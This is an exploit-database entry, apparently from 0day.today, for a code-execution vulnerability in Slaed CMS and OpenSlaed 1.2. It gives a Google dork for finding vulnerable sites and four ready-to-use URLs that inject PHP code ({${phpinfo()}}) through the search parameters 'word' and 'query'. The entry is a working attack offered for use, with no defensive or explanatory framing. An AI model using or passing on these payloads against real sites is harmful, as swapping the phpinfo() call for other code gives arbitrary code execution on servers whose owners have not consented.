Slaed CMS Code Exec Vulnerability

2011-09-11T00:00:00
ID 1337DAY-ID-16927
Type zdt
Reporter brain[pillow]
Modified 2011-09-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Slaed CMS Code exec
# Google Dork: "Powered by SLAED CMS"
# Date: 03.05.2011
# Author: brain[pillow]
# Software Link: http://slaed.net/
# Version: OpenSlaed 1.2 (free), Slaed CMS <= 4.*
 
On different versions of this software next vulnerabilities are availible:
 
/index.php?name=Search&mod=&word={${phpinfo()}}&query=ok&to=view
/index.php?name=Search&mod=&word=ok&query={${phpinfo()}}&to=view
 
OR:
 
/search.html?mod=&word={${phpinfo()}}&query=ok&to=view
/search.html?mod=&word=ok&query={${phpinfo()}}&to=view



#  0day.today [2016-04-20]  #